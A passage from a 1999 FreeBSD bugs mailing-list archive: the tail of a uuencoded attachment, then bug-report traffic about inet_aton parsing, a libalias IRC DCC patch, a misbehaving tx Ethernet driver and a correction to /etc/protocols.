M2P6$?I:'EC%P5'F)I6:!4P)9CT8*9L`JS!:T'(Y^B(Y.]G8/CCWWIH[B2R#+ MIC!K7BD!N;9DNQ%:%:ITQ>R_^WE3=?7!);'Q'PD.-7*<0LO-%?+\`O_@1MSFI:R&OV=P3!P(W@>G*"_]I_^?RPD]![KSZ^>CCPO=PZ#.1,RCQ]*=X5/Q?.)C$,E M,VF%K`1:^-\,;_ME1Q MI#+T,^_9K3'D&))="65M`N!T2.S.G355_B2QDT1.KQ!7=?P3,OYH=9YLJ!'( MO_`6%H3QX_?O?]I[@SRVJ;.7?K>B#?A?WI":'1X9RW.07H&0^CRZ[/\!AYW, ME_7AX]';]Q^/&P22/+V"`R=(_!%S<1!EHO_(]5%8C/">H^.7A\='QX=[[]XT MVXC^`LG;WOD*F`MGPRJ!17V%@U;TQW08M4%:]4GYP$,>-3YYTY56DXN&QIIF MJI'C%AP3''+"YQ3]A1%R9C1-4`<<5'#C?UXFEUD2-@MV(*$*YQ%G8#@4ST\& M%T9("3L'B\668DEA4EJR;9>3#5.W[DRSUJTD:^4IUKH[P5J.7JT[DJL555.K M=5=BM>Y#*W*=1MF\3''(]X;?]/X_WX1JP[GP;:YT:Y:^\_V>- MXJ,GJE%\3`I%O=8S<,P$X)4JK]X*[:8"@$:7I!V85DU8F]TP,J/J"9M;5C/@ MDP90RJ<%,.6ITS,RFKAIU2*,:6&;WX M/DX5^U0T;WETK7N[_HKKK$.LT)H5KX2N"1$0>`>Y MD%]9P#C(W845I$;YZ#-V-1FHJX1HM]CK!G(7R(J:A:!%'$1`\L`YOC%-LPP/ MK,U(_)M7L:2<#NNN4]7798BC[??&J2W\*RUR.-^FZ7>D/+*6N8\/I]0PA[Z[F@P8V5-XH MM87I..4[88<"_RVV=A*WL(B.TSZ6]L MOBM3K+O`?!?$]R[,LBZ;='7C7@\Q0^->IRC`TU9UXF_<=H^/<*:LK*BDXEX8 M.;I,\K>B.G&(W70&3*+AY!I40,56%F)#T%NCECA)9!0CY,K)@,YW:T'$$9)9 M2H*+2/P/0O-H'.V]V7MW+$`>5].F$VPJA)8M;VSZ'21!&9U3AC$_2.IX:+R0 M2%;W>S;+)8B)@0\6H?4KRV4%>Q6J.:K4G9:7MMXR1%K4^6-4%ECL=['NL7Q1F85M'*<)Z1 MZDSGV)!PY'G"].<7V:]=N;\02%]$K\>1:(IUQ7/4"J^TM.[]Z_>(@:#/@&[.V;\ M)+>R5!!KR^[D3!FVI37<0Y&HTW'P9[PSA,QP<$6B6F!2J7VE.> MP<7!`]EP(E:'>E9*V?92_-'S)QUZ.\5E?N?X1NC[ZZ_(:1A):&'5IAZMV=_' M1SMB4MD+?XU[Y"V7R*E<#]QU83EU5#["21)MS]B:TH<+RP/(DZT`%XZ%2;,[ M;%UW/&`Y`.=/3&47# MX-KJSY[_^NG%RE]UC_2-T=$FA,OB`Z<9@5\(\%TEH+<6K4/OS.CM&$$]C-)B MBJ:.!NQ)CCQ\XLDC\$E%6C!U%EDLW3I1=G?IM&7F$J=#-X7J694K.IQ72E6Z MPI>;>%&(TGEX=.Z":74[K!I;?_J/FKP_'-N)91'!WU:7675)%T=X$_6KHN$"W_6PHSO5^<=:]C:PI+-X$ MQ"/C%)CT$C]O?H;*-MA+T/4#.YX@2NYPJ75%&"9L/+P[CGY?:C$A5I$W[;'U M,H%]..-BIG5+K(>SJ`_\$Q&G$!&FCXP/`X/-"`1$S92(D6"KSC$'Q;^R@)+. M(ID:P[`YPPESGQX:U^.+0781=9!5?P'.]%=\XW`K$+H2L2S[XPQWOV1"2!T) M6AISB"TE(=N^CM#$6@UQU')G, M*$$$[(T4D#9FZ%1"KDGHH#E3J!??)?#T_^ZY$T%SD1_RPYEJ&S M#>1$+A2D*7*@[A/4X<#?GNX;12-M$D=8,$#8)$*4HCM7-5I45E+'RJ(YJ@8X M%"7>=$-:)U6@6F;.^R#[N$6U[.($4Y$S%UV,"Q8..U^2#%ZKK4"JWTF?A,F` M:9`?_#7BB]'K?-K/K+LHII8/E/Y&VK,EHAL%;'5FF(R027V)+J\RP@.BN^[D MS'L*]+-(O?58S.PC<"1D)D@'*XQQ5:28^DSH"TB$OVK>1B:NU5'FJ-7JNS2! MX"&ZB4TB]/ZKU,\E M7URFIFQ\'1%*<"'#^U_><0;T,_09X'5%AC>''SC#^6QJ,L#K\@RL):(LXF[M M,O%S29_9""JN48`_^AM^)X!A*)$N5+2X#\9EJ:3,C^^0:ICK:A(0DS^4D?/H MD-*ST=*FRP"O\7!6.EJB?,)LXI+NLNUI4`29Q,/RN<&@P%@`._`4^N<]=4IR MD[8+,Y.G>R$OOZVHF>V;N.FSV:7+_%J]C`*37[P9JQPZ4OIA2:/S"4*XT][Z MXL6+Z"Q-,D;D&J?`'?%VG<'TD4"4-B)C&/'2,J!DSHTI:H2%-',M8&\\K)SE MA0(1,#H!?RHG/WI:,_G1R2F?.XRS%930[L":YSE;8P\(--K=\B)_7I<]'\W' M[I9NZ.[GD)D_?AH_[6&HT+7X43=_#.!#""H9W!&$#CE>)0]"&9:MZB:R"D+F MIA:VMUBR?K?-#!Q.//I,MC3EEJETKG1F<&QO*A9WQC2R730E]%:@,$_$SE.Z M1%U$6'LZ72&,O?)22@P3Y:Q9A.J'+]$V^V2[(RQ9=IH/<8$:Y=:=.6-9^O?K MURAG>HLJY9=J2T:'T4+'C4E=:$>9[ROO*)+STZINE-#YXA?9_7(1%PPI33`1 M>VCU4.*>C@9.^L;E"RA9:8!H]IW-LO>PCY2^A^WB[Z*`ME@M]8(@FPT\'L_4 MXE![6M4/;WPK,XFO2V[-0>SN'QK1N[7#FAJ;MP=E;XVUL'G+VV!9(;R#EWS! M;;CDM>R!)5]X;ROY0-M6:5'60ME\8"9?7@7P[W]F+"J-6%T4V]\F*$:IXS>Q MBN_/HL;W69,Y%;X)K75XT?G`('=B@:6P_M*Z=LAH:6($$3Q)I+%<6+L;>IP4E.]^S#074?1)1S53A9[A[EZ]2OJ,+)BZX2(S+>IQO,):L& M0T1V/QQ>:F>4*F)S=^5RBQM";+FR(7P4,`UQIX&_O2&T#U0VA(\8IB'NE/%W M-T1Y7%53W-'%-\:?7NXQ!W2':9M-EIG[[;EDEZEHXATD[55JO)#MOQ"X&1'H M?EW@O:*B[7*.<[3-'^7N06"W^514Y4]EKK:J@]D]:M6-K:)2=Y(K]#`\S-VC M1MDQ*RK4TU^AOO``>"^Z\DY<258^,;H*%Q\:;ZO8;:YRN/"VX[I5JO'X_??< MH+*BB"PQ MG$]':>[=))F?G>([BL#2PYH?K<==OH71FT0P*@5% M3/#3%E5_8@F'6..89)ZBB4!P;B^]=3T-+E+9MVVHSFVG9(RY^W)O'\_91R=[ M1_OO?FYDI^JCUFSZZ+1\#[LX-RS17&YKND`L&J]0M8O0@^^"X-\D?@9YF&HV MTR2=M%&HTWR<1TL(LT5DQ3EI4U[2T@;^RWCYPU!FO/=D3/0X$K`A!C''J:/$ MA[?TLD![UGX34ERKM[8>=[S]L372KS)K5I]79[MC0Y]Q%4CC44:JFZ$+/-6N M:3@G-'T9.OXB9/#V0X7P5;X,UC,T!M/RJ%486$T3!^&G9*I![1%7[R'^HJ!^ M!ZO@??#OV+W`52;H8GDUPA1;7E&%:.Q\46U+H;>*=MM;>X1>`#V$EGGJ+18U M!A4DK[\$IN:#29DOSO*DD(4"9`=NQMI?MO1IU\)!JI6.$J65`&,5XV.BBF'J M.`@B1OF=7L:!//HIESF]2^8"AR&)@I!AS!I-^#&?B8F:83`Q188L#HP/_N5G M0*U(DM*\LLWYP95!Z_"@/5IS@Z9KJ&L@+VDH""$3#2R=E09-@@5AS;&0%_1W M,QH$"RO?:C-M=5R+?5@PK+F1()I2V-T'C[3CU4%@.@X0-P_&V,>%*XD)5S8* ML,3"T*&W4J-0T$U@[B'?Q#J-G7)ZCWH*IV[L9606UJ*/YJFSFRI';&('E MA,P.9I^3$R*4=!FC'Z%IRV7_#]5P6Y\4C@;76IQ?S,87%F&-.L9$^!XZ[[%C,O+L6-+W7%.#\6FL\T_>:4] M6N\9?YW`30NV0]BN/Y(YP?!RCN8J<'@:)-Y,@K#9TN$F"57D_G2GU#"+:&I] MOUO[12#B,%06=`8-".H$KFX??7SU:N?HJ-:0R+V/G\:]IU'KR5J\L4'-@FS'8BTD=B)1 MG7&SZJ5`?!+.!V5%,CT*JZ-`0H<[NWO_/OE_N)G4ZOX-QEL@8P":E1AA3&+Q M^,M],D,E$!VV4B!RQ)2>+`88-;B9)+D6"RB.-R((D(*=*8#5)09Y^"K?*M;B4+D5!\JD M("\'[`WNR;U^-PXU*T%&N:RV.HDX4!C$10U6S#*VU>-;JLCU;:#.!UX$_$@M M4$*2RK];,BF/<0R)\IK\:H*F^F0N-=>-:TLGAP1/=08QC`-_BO&'0E129\>B M!SQN@"(EA2\1C?!S#+L57Y!Z,4,0>?"%^E9=]F>_)7HCJYTB,YK@/&E+)EN8 MJ<0^-Q8V)1.ATJ^,"G9V$32*$HCJS),)@V%E-)4"M9\D9!U(2?%&W6R M;^,4+JMT![*R75"I85`PMKGF&U_?+3FYWS)@'`41T>(H)&P>Z=M7`!\J!H_1 MOE;F_=&X?`SHTAC[0N!`T!_VLTG&""'/X) M?!`>F/L0,;81?*<(/SC+:;V@T%B$RMJ.UF,:%1&(\B@K;(QE<+30S'@#KUR+ M$%OP">.AWC@;+!EHYRO-+@`7[/HL,>RLB+VEPH>)&(=QNX`=A^:S?&T=6*7A MVFZL4&G#2?.^C@-;HICX,$OGZ=QQ$-SC1MF`?A,.F`;9M:7%P/=7FS[TDK?J M;FH\FMH*B[EB>:WY6+HUJ1AL0I.13A+X`I<;&F_+MU;9-P^;D`Z'L/AJEZ/) M"<')>;-I@L+@?[0"'QCA2QA7L8 M01?/D_G)63^[4$PN'[J*X\M0U)M69_VIXFMS#R'UR3B]3F:HD38]%,(%D;OS M'SWL5\&!M"5)PMC@;F@Q!0?;HHF5&_;2E`4'A^H\<233U3>(8EG+7Q26J?-X301L-Q#CY./A_MLTR\\O.OZ:>8@I=V'8?OKRH3^_*$Y&F^Y- M,G\EJ/-EU*@\->L`^#;XXGDET1&RPI_:1H\K25%,B=Y*GP*#;I MC/%/X3SK]H3R0'P59U/@S]_L3HCJKKX2"@$&>IV(V\I>P^5.Z>@@T^N(Q_`B MG_0>WT&Q1UZLJ[X"59K%JFF;DE1RR@.B6=ITJ0#!'Q M_VS*#.VL,RDW/"GQ4E4#LL#,LPCI('&38S%ZV6%@%UF,#A&ZG?,676J5'2>0 M6WE=.QT'&BOI^`S=1?6L(WL]QW5[T@M"1.:!C@19RR\9O%1>9J"CD--%M6DZ MA57;;>I< M^WT`0:2]'!6$?E=L[0H&$B1R4""XOPL6%4-1J=O9G2*#X+W"2P[,!O+H)3.B MO+(FI^X15S72]%"2P.:GQ$<-I$9Q41/1>G"2;:FZP^'K#=+SR4C\R-27#83@ MDZ+*2NNCE"3\#1`\K[/S*V2QF;BE41-4(R+YLV*]*NA@ZAK\M7YE M]<'U&3J3&=>Q6JE2R?7(78Q,W6)X:`KQ7EZF31LY^>2J"M7F&(P'-L4Y&UDZ3JG MC3;TYPK:,9M=FE:PSY8E/+DVN13J#N53B(<2F@[!/T@!H[7++4IVI"0E9W%] MBE>3#UKIHPC$@2I;A3I8'4[.6M^@,,<;YF[VQMMG]8O-@#4RF]^M(11P\3Z- MZ1#8`NQ::Q)*^*]BC((90:"QQAA^(VJ$^=R\Y&`:@CX1*($=R#R9^MPW+T?B ML,F-&1"PV$;'8>A2,?W<%3&)'DT7Y]J4XZ$JJ+.G?R:S%)OG,#0*O;"B'=.# MS08ZCQ_'&VN(<+H6=_F,SQ!,N=-[YLXX2GV^B2!&O0+_*$HDI8+GX+07M:+N MVB=2IG?7D"K#J[-SEG(N^W]@UX">:I(20[TADM,@?,R\Y9>(#U"4V&+@ MRQ".W'V+)(/53%Z>J5(8),D32_)H"]L*?P=3 M"J(TY6!(D=BTD.Q)I7C7O!4JP\$R^LI<\@R3`PG?(<1;E.$E"A1WB9>YJ/J` MTQ^=$=B7'VE9J[5:F3-$H8::6B);,(9\FH91GD*@-3*E;;5P4+A06?C.[([F M1%!] MM*V6Y#NX)9]LR,6%E6V,\79^4-OBPK;/6WD%;V M_I+,"K&_*+N(!<706!0J0EYJ"P MA3`/_8QL$Y[:ST'J1],X7R6_B_$S!S"3I,*X3)D*9R9Y^%H^$JQW1,\\RTLC M`I0SE%L/.B!M/(Z?=&!SW-B(NX^<`GR)S;D*HA."7[$2?#CUH9@"U&NJ*8B8 MU`X]NFF_9@ME<4=F=^=;?;%5`3*'" M@HN1SL8CCV%&QR05%RH=$G--L.Z(=VQ%M1]BKFSO(/BPDD,/Q%SAUO_P@0VW MGH>YTBD:SJ*RT;'./&U&]7OY%^:JHPWE;Z_/N!'FZJ-=Z.^N+_06S$]UZROX ML/'R7H(53H"D<.A'Z21IST?0:'2S4+,(93VEC>-$0<-N:8MUW,L5YMWV'M;- MG*]>KO3`4^]A%81N>;GRK5/>PXH/?/#RR\I[X#V4.-;AKD`;YV[WL-+5?[Y\ MC2INROV*__N<]OQF=?LFP9$:\SLB`GK0._W7(7[D`#Y\5<6(>"U:9KM]2('7 M.+])G,4VJB,R"A=!BHG+5'21'&@1= M"20:*IA\4&R.;2[)']9$2?]11H=1O.\_1LY1P=:(>E(*2^RK*Z72H##KG,!F MB[ZMC.+D]7(?C9!M_J(4'A[O2 MF*[#_FB<13`7SD>(Y`C]8/AA*`VFB>`=4*:(_V,GJG0V0/FESM,'5:9?KOM? M5LD'>Y+.95J=K=:K35*@/]_L]HKJKKR[V@BNKC8B;BF!)>*OBENK#89*-"GT MRFK]T697KJS('J7K_%Y6U$>Y5;B\,F\$^#.\TE)?9CT1LKN57/?3O)AB3&J. MJD`PT1=Z+NQMD*O5$T6,-0=.-6@T'LNF:#%7+"]9;1Q:%4:-F,[85I"Y6,U% MKJ>+,O*&\T_SP(FYD;'_%#FR86$:_GV[-+RB=*B^6@]/Z[24,`^U1V&DZS\. MT[0>M9\K(>H_U@,$:7@.RZ'(\0TQI6W@YLP%MA`.V3=Z'IG6B;I],*AL-4DJ MJ%>76_/+Y!(]P4>3R%/51[<.M,20E+SYXHB),W`&*A1AGJ,,6.7"7&UVU#@E M;[":=51KGG7]'?PMCLWD#-^-.[VH]?B),5G$"BJ,<-$;+A?Z&<<:WSL%`Q)S MA<9MN;V,^AK\FH^SB\17-;AH;219WK8QTV1""Z[+C;;D:JSP#ZX4H9S8ZHG> M8EW`[O(EKXAOG]/5],GT]?TIVS_)$NRL/8G7HU:G^R3NK@MB@%0Z3TFM[PI" M)3@V3O9^'K+`)>4LN4Z^I%/OYO/F.)8?._)C7]_L[^#ML,MA;HBG)%9>I_P1 M_@Y&,%\=#G`ALCVFH@V)+[5BTXS4A4<[-=CX:`JF,;;QX=0^#,A1U$C66UM> M6%[IDP2'>_O*:4Z8&U",BC6])7#P&BAY]C'V\>F9?N=RH:U44!]WZ.75Y:VH M;R\.*$\#_JY$G358Z?9&U/.J31(RSFUY5"UC5-;SFFN'!8?J/U0 M7QNRL%;0%&)[XRD!M9D&=\F?<7+Z&00Q$--4CTDMV,VP;:"NN.Z0K^MB!PZ"F9A>H$D?;LEL M_1XU0&:]FB'&__A+DTT8LG2,\-:3+XQ>KD$0LES<@P[61H7$T$H/=)Z?RZZ- M)T5[>RDZ%Y41@]7KQ!:.E01W>U61#C@Q1@@-7D`+RB\*:6U,YN:)O$AR.V,R MY;U1MD9N\/)?U;NCVV?R76]N8CX*JS`0L'`)`Z?A%4HW'Y*X-62R:X'?'J&! M;5>"%@%U0[,I;'*00&F%5(IRS;>';XF=$_.5)PX`W4+"HN28@DH-6_M>O\EG9 ML"\N>(R!NV%VRPEYZTY"6M<@: MS3-#WEIO8X0/Y&)4^(,XF-VY%]HKA#QNY7,RL\_%D)Z&;4TJ6!9'>-$FUI\] MKS/3*N%5MH/(IYXMP\$U6G[^`':ETX85`S)O2".< M#=TAJ>6YAMM#R6!JCU)X[X?R;56@>E$^L$8%$S/1'',?4#4PGYJ./4SPEWL? M<`(O-U*K8Q(6H:^JZ_`!KX(%7UQC9<+&^3@]_:>6%Y;]H-6E/(%/\7ZN\X7K MNX.3#SN'>^]?,_5*.A6$'OK;N\6E_S<=$\64[5>A+]QXC(:L[7;)77O)&(B] M"K')M".(QV"TU"IQA;R]A:HWRXM%%3,=XTE=7J$!$L96:9."T<14L?J`O-P4 M]+Y$XU#*Z*J;H6-O@JSD]HXP3DO0-LLG[]VNE1>_?EK4,K/$;)UF=2RHDL/K M.MK)F1&YN"FV_5RGO)Y*U<-=)YR=LOG::,9QM)&D#R-/!OX$N*$)T?I!XM3( M5L[UPMX!.[XNHW$R7\ZBBW1*=RTS=.Y/)V.,@IZ@XS6PMK>[X9++X%B/(T,A MMV*>T.+R;1;@JL[II=9"G]UB)'AMOWCOZN(V[N1Y+$"$$H3%`U]UWT:''/,? MUF)/&O:_\)SA!$N[CV!N>(# M.=7NA+-'C$P:=$6%3IQ2Z52VKK#797L8\BF\C3D[D1N!U;IL6K"[EG[7!.:$ MD+LW,P*C&R)?1C/<_2B=['2A6?JADA!\/*C8#UX!3+HD;]+XR^AXSKA+ MT?D%9""'3LWDK,GX2,#(Z2P/ MW7>!VA'!\W-_-$;/PE4'5H!7$;>B%51QV=P0EFES^#-^6?NTS7;/;F"*X28I M!J2RAXI)QC>'>-Z&X0(IFLNFF@)7QXU&/D.TB)ND4N"W9/.4_S1_]VH78)V\35"X`=IIFGO\)3 0V?U&2FKX_P..[SP0S.0``$B) ` end >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Sep 8 22: 0:56 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 876461551A for ; Wed, 8 Sep 1999 22:00:55 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id WAA64203; Wed, 8 Sep 1999 22:00:03 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Date: Wed, 8 Sep 1999 22:00:03 -0700 (PDT) Message-Id: <199909090500.WAA64203@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Bill Fenner Subject: Re: bin/13628: inet_aton accepts too much Reply-To: Bill Fenner Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR bin/13628; it has been noted by GNATS. From: Bill Fenner To: xaa@xaa.iae.nl Cc: freebsd-gnats-submit@freebsd.org Subject: Re: bin/13628: inet_aton accepts too much Date: Wed, 8 Sep 1999 21:58:22 -0700 Check out PR misc/10231 and http://www.freebsd.org/~adrian/inet_addr/ . Do they fix your problems? Bill To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Sep 8 23:45:35 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from ns1.yes.no (ns1.yes.no [195.204.136.10]) by hub.freebsd.org (Postfix) with ESMTP id 10A36159A7; Wed, 8 Sep 1999 23:45:28 -0700 (PDT) (envelope-from eivind@bitbox.follo.net) Received: from bitbox.follo.net (bitbox.follo.net [195.204.143.218]) by ns1.yes.no (8.9.1a/8.9.1) with ESMTP id IAA05933; Thu, 9 Sep 1999 08:45:49 +0200 (CEST) Received: (from eivind@localhost) by bitbox.follo.net (8.8.8/8.8.6) id IAA20229; Thu, 9 Sep 1999 08:45:22 +0200 (MET DST) Date: Thu, 9 Sep 1999 08:45:22 +0200 From: Eivind Eklund To: Brian Somers Cc: ru@FreeBSD.org, joelh@gnu.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/7669: libalias does not IRC DCC packets under certain conditions Message-ID: <19990909084522.R6332@bitbox.follo.net> References: <199909081659.JAA94740@freefall.freebsd.org> <199909082346.AAA06689@keep.lan.Awfulhak.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.1i In-Reply-To: <199909082346.AAA06689@keep.lan.Awfulhak.org>; from Brian Somers on Thu, Sep 09, 1999 at 12:46:03AM +0100 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Sep 09, 1999 at 12:46:03AM +0100, Brian Somers wrote: > > Synopsis: libalias does not IRC DCC packets under certain conditions > > > > State-Changed-From-To: open->suspended > > State-Changed-By: ru > > State-Changed-When: Wed Sep 8 09:59:03 PDT 1999 > > State-Changed-Why: > > Awaiting IRC guru. > > I fired the attached patch at Eivind (cc'd), but he pooh-pooh'd it > for a reason I forget (I know nothing about IRC). > > Eivind, have you any advances on this ? The patch changes the behaviour from being correct according to the standards and working with 90% of the cases, to being incorrect according to the standard and definately working with the remaining 10%, but possibly hurting the 90%. The 10% with error has configured their IRC client to use server extensions to get "their own IP", as opposed to using the IP they are actually binding their recieve socket to. My previous stance on this was "client configuration bug - fix in that end", but thinking a bit more about it, I believe it will only hurt a miniscule fraction the 90% (perhaps none of them, though that would be pure luck), and thus would be an overall win. Feel free to apply - we are more likely to hear from people we might break than from people that don't get it to work from the start, so it is a worthwhile experiment. (I have nothing approaching an easy way of testing the patch beyond compilation, since I don't use NAT for any of my own boxes anymore). Eivind. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Sep 9 0:53: 3 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from solaris.matti.ee (solaris.matti.ee [194.126.98.135]) by hub.freebsd.org (Postfix) with ESMTP id B6A8A14D00 for ; Thu, 9 Sep 1999 00:52:22 -0700 (PDT) (envelope-from vallo@matti.ee) Received: from myhakas.matti.ee (myhakas.matti.ee [194.126.114.87]) by solaris.matti.ee (8.9.3/8.9.3) with ESMTP id KAA09604; Thu, 9 Sep 1999 10:51:24 +0300 (EET DST) Received: by myhakas.matti.ee (Postfix, from userid 1000) id D2D2CD5; Thu, 9 Sep 1999 10:51:28 +0300 (EEST) Date: Thu, 9 Sep 1999 10:51:28 +0300 From: Vallo Kallaste To: "Ingram, Russell" Cc: freebsd-bugs@FreeBSD.ORG, "RFI@home" Subject: Re: kern/12979: Response time continually slows on idle machine, PIII processors on version 3.2 Message-ID: <19990909105128.B12876@myhakas.matti.ee> Reply-To: vallo@matti.ee References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.6i In-Reply-To: ; from Ingram, Russell on Tue, Sep 07, 1999 at 12:38:40PM -0700 Organization: =?iso-8859-1?Q?AS_Matti_B=FCrootehnika?= Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Sep 07, 1999 at 12:38:40PM -0700, "Ingram, Russell" wrote: > After looking into this problem I find that tit is quite different then it > originally appeared to be. It appears that the Ethernet connection response > slows in a shorter time then the console login. So I changed out the SMC > 83c170 Ethernet board that uses the tx0 driver with an Intel Ethernet board > that uses the fxp0 driver. I ran a test over the three day weekend and the > problem appears to have disappeared. I'll confer back on this latter after > we have more cook time on it. > > In the mean time it appears that the problem Synopsys needs to be changed to > : SMC 83C170 Ethernet controller using tx driver slows and stops machine > after days of Ethernet traffic. What I have seen is the card does lots of interrupts after three-four hours of workload in some machines. I've seen more than 70000 ints and my onboard SCSI response time went very slow. The machine was idle, as in your case. I personally blame the tx driver for all the faults as the card works very well under NetBSD. Under FreeBSD the autonegotiation doesn't work reliably, opposed to NetBSD. Perhaps the MII bus from NetBSD will help, unfortunately the tx driver wasn't converted yet. -- Vallo Kallaste vallo@matti.ee To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Sep 9 1:38:50 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from relay.ucb.crimea.ua (relay.ucb.crimea.ua [212.110.138.1]) by hub.freebsd.org (Postfix) with ESMTP id 9831C1522C; Thu, 9 Sep 1999 01:37:48 -0700 (PDT) (envelope-from ru@ucb.crimea.ua) Received: (from ru@localhost) by relay.ucb.crimea.ua (8.9.3/8.9.3/UCB) id LAA68166; Thu, 9 Sep 1999 11:31:09 +0300 (EEST) (envelope-from ru) Date: Thu, 9 Sep 1999 11:31:09 +0300 From: Ruslan Ermilov To: Jeremy Nelson Cc: Eivind Eklund , Brian Somers , joelh@gnu.org, bugs@FreeBSD.org Subject: Re: bin/7669: libalias does not IRC DCC packets under certain conditions Message-ID: <19990909113109.C64941@relay.ucb.crimea.ua> Mail-Followup-To: Jeremy Nelson , Eivind Eklund , Brian Somers , joelh@gnu.org, bugs@FreeBSD.org References: <199909081659.JAA94740@freefall.freebsd.org> <199909081933.OAA65250@shell-3.enteract.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.3i In-Reply-To: <199909081933.OAA65250@shell-3.enteract.com>; from Jeremy Nelson on Wed, Sep 08, 1999 at 02:33:34PM -0500 X-Operating-System: FreeBSD 3.2-STABLE i386 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Sep 08, 1999 at 02:33:34PM -0500, Jeremy Nelson wrote: > In article <199909081659.JAA94740@freefall.freebsd.org> you posted: > >Synopsis: libalias does not IRC DCC packets under certain conditions > > > >State-Changed-From-To: open->suspended > >State-Changed-By: ru > >State-Changed-When: Wed Sep 8 09:59:03 PDT 1999 > >State-Changed-Why: > >Awaiting IRC guru. > > > > I'm sorry for barging in on the middle of this, but i read the freebsd > lists that are gatewayed to usenet. The above pr looks like an issue > that comes up frequently with regards to the ircii-epic irc client. > > Because i am not familiar with the pr system, and because i am not > really involved with freebsd in any way, but, because i am the maintainer > of ircii-epic, and its probably my "fault" you're having this problem, > I am interested in helping you solve it. The alias_irc.c stuff was > originally written by ee, who i have semi-regularly contact with on irc, > so perhaps between he and I, we will be able to solve this for you. > > But the reason i email you is because i was interested in getting more > background information about this. I am confident we can probably get > this working without too much effort. =) > > Jeremy Jeremy, could you please take a look at: http://www.freebsd.org/cgi/query-pr.cgi?pr=7669 Thanks, -- Ruslan Ermilov Sysadmin and DBA of the ru@ucb.crimea.ua United Commercial Bank, ru@FreeBSD.org FreeBSD committer, +380.652.247.647 Simferopol, Ukraine http://www.FreeBSD.org The Power To Serve http://www.oracle.com Enabling The Information Age To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Sep 9 1:40:42 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 1151C15D07 for ; Thu, 9 Sep 1999 01:40:18 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id BAA80723; Thu, 9 Sep 1999 01:40:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from sofia.fio.cz (sf.vol.cz [195.250.145.38]) by hub.freebsd.org (Postfix) with ESMTP id 6B02B14F26 for ; Thu, 9 Sep 1999 01:38:31 -0700 (PDT) (envelope-from dan@sofia.fio.cz) Received: (from dan@localhost) by sofia.fio.cz (8.9.3/8.9.2) id KAA21259; Thu, 9 Sep 1999 10:38:22 +0200 (CEST) Message-Id: <199909090838.KAA21259@sofia.fio.cz> Date: Thu, 9 Sep 1999 10:38:22 +0200 (CEST) From: dan@obluda.cz Reply-To: dan@obluda.cz To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: conf/13652: Bug in /etc/protocols Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 13652 >Category: conf >Synopsis: Bug in /etc/protocols, update request. >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Thu Sep 9 01:40:00 PDT 1999 >Closed-Date: >Last-Modified: >Originator: Dan Lukes >Release: FreeBSD 3.2-RELEASE i386 >Organization: Obludarium >Environment: irelevant >Description: The current /etc/protocols say idpr-cmp has a proto# 39 but IANA assigned proto #38 to it. The "see also" line (line 7) is no longer valid. Current /etc/protocols know only about a small subset of assigned numbers. >How-To-Repeat: irelevant >Fix: Change proto#39 to 38, update URL at line 7 to http://www.isi.edu/in-notes/iana/assignments/protocol-numbers Update file from current IANA assigned protocol numbers to add new assigned numbers. The updated file follows (all FreeBSD specific items are retained): # # Internet (IP) protocols # # $Id: protocols,v 1.11 1999/09/09 10:17:04 dan Exp $ # from: @(#)protocols 5.1 (Berkeley) 4/17/89 # # See also http://www.isi.edu/in-notes/iana/assignments/protocol-numbers # ip 0 IP # internet protocol, pseudo protocol number #hopopt 0 HOPOPT # hop-by-hop options for ipv6 [RFC1883] icmp 1 ICMP # internet control message protocol [RFC792] igmp 2 IGMP # Internet Group Management [RFC1112] ggp 3 GGP # gateway-gateway protocol [RFC823] ipencap 4 IP-ENCAP # IP encapsulated in IP (officially ``IP'') [RFC2003] st 5 ST # ST datagram mode [RFC1190,IEN119] tcp 6 TCP # transmission control protocol [RFC793] cbt 7 CBT # [Ballardie] egp 8 EGP # exterior gateway protocol [RFC888,DLM1] igp 9 IGP # any private interior gateway [IANA] bbnrcmon 10 BBN-RCC-MON # BBN RCC Monitoring [SGC] nvpii 11 NVP-II # Network Voice Protocol [RFC741,SC3] pup 12 PUP # PARC universal packet 